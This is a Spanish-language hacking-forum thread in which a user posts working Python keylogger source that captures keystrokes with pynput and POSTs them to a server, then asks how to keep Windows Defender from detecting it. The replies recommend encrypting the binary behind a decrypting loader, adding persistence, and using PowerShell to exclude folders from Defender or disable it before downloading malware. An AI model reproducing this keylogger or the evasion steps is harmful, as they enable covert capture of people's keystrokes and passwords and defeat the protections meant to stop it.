Foro de elhacker.net

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: elmarkus2 en 25 Octubre 2020, 05:23 am



Título: Evitar ser detectado por Windows defender
Publicado por: elmarkus2 en 25 Octubre 2020, 05:23 am
Que tal amigos, el día de hoy estuve jugueteando un poco de código en python, hice un pequeño keylogger, aquí les dejo mi código. En pocas palabras, recolecta la información del usuario y la manda a un servidor local por POST.

Este código lo compile con pyinstaller, para generar un archivo .exe. Mi problema es que el windows defender lo reconoce inmediatamente como virus. hay alguna manera de evitar que esto suceda? ¡que me recomiendan?

Espero puedan ayudarme. saludos!

Código:
import datetime
from pynput.keyboard import Listener
import requests

value=""

def key_recorder(key):
    global value
    key=str(key)
    temp=""
    if key=='Key.enter':
        temp='\n'
    elif key=='Key.space':
        temp=' '
    elif key=='Key.backspace':
        temp='<='
    else:
        key=key.replace("'", "")
        temp=key
    value=value+temp
    print(value)

    valueSize=len(value)
    if valueSize>20000:
        callBackend()    
       # sendmail()


def callBackend():
    url = 'http://localhost:5000/api/v1/todos'
    myobj = {'somekey': 'somevalue'}
    x = requests.post(url, data = myobj)
    print(x.text)


with Listener(on_press=key_recorder) as l:
    l.join()  



Título: Re: Evitar ser detectado por Windows defender
Publicado por: el etrno en 12 Noviembre 2020, 05:53 am
Simplemente ofusca el código (básicamente cifrar el código fuente) otra opción es que tomes el binario y crees un programa en Python con la llave privada que al ejecutarse desencripte y ejecute el binario malicioso la ventaja de esto es que es una forma fácil pero primitiva y no 100% efectiva de ocultar el proceso (lo ocultara de defender pero no de una inspección rápida del gestor de tareas porque sigue existiendo un proceso que no debería).
Note 2 problemas en tu código el primero es que no tienes nada que permita la persistáis y segundo es que nada impide que rastreen tu ip cuando te conectes (y no estoy seguro de si funciona fuera de una red local y seria un grabe problema por limitar el al una red con todos  los problemas que eso implica) 


Título: Re: Evitar ser detectado por Windows defender
Publicado por: 0x22 en 10 Febrero 2022, 21:50 pm
Yo lo que suelo hacer para evadir windows defender es un script en batch/powershell que añada una carpeta especifica en exclusion para que el windows defender no lo escanee y descargar allí el malware. También puedes desactivarlo con powershell